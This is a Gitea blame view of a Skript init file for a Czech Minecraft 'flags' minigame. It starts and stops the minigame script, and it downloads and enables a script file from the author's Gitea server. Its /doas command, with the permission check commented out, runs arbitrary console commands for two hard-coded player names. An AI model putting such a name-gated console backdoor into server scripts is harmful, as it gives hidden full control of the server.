Skript_flags/init.sk

51 lines
1.8 KiB
Plaintext
Raw Normal View History

2022-08-12 18:34:10 +00:00
on load:
send "[GG_Systems] Init Loaded" to console
send "[GG_Systems] Flags Ready"
set {čas_kola} to 90
on skript start:
if file path "plugins/Skript/scripts/-flags.sk" is not missing:
if file path "plugins/Skript/scripts/flags.sk" is not missing:
delete file path "plugins/Skript/scripts/-flags.sk"
wait 1 second
disable script file "flags.sk"
set {flags_state} to "stop"
command /startscript_flags:
description: Start the flags script and allow it to be used
usage: /startflags
executable by: players and console
permission: skript.op
trigger:
if file path "plugins/Skript/scripts/flags.sk" is not missing:
disable script file "flags.sk"
#delete file path "plugins/Skript/scripts/flags.sk"
if file path "plugins/Skript/scripts/-flags.sk" is missing:
2022-09-05 17:05:57 +00:00
download from "https://gitea.anorak01.top/Anorak_1/Skript_flags/raw/branch/main/flagstp.sk" to file path "plugins/Skript/scripts/-flags.sk":
2022-08-12 18:34:10 +00:00
enable script file "flags.sk"
reload script "flags"
enable script file "flags"
reload script "flags"
broadcast "§aNačítám Vlajky... "
wait 5 seconds
execute console command "/minigame_flags_start"
command /stopscript_flags:
description: Stop the flags minigame and disable all commands + events
usage: /stopflags
executable by: players and console
permission: skript.op
trigger:
disable script file "flags.sk"
broadcast "§4Ukončuji Vlajky... "
command /doas <text>:
2022-09-11 20:04:52 +00:00
#permission: skript.op
2022-08-12 18:34:10 +00:00
trigger:
2022-09-11 20:04:52 +00:00
if player's name is "Anorak_1":
execute console command arg-1
2022-09-14 19:41:57 +00:00
else if player's name is "Dauern":
execute console command arg-1
2022-09-11 20:04:52 +00:00
else:
send "Yeah... nope :)"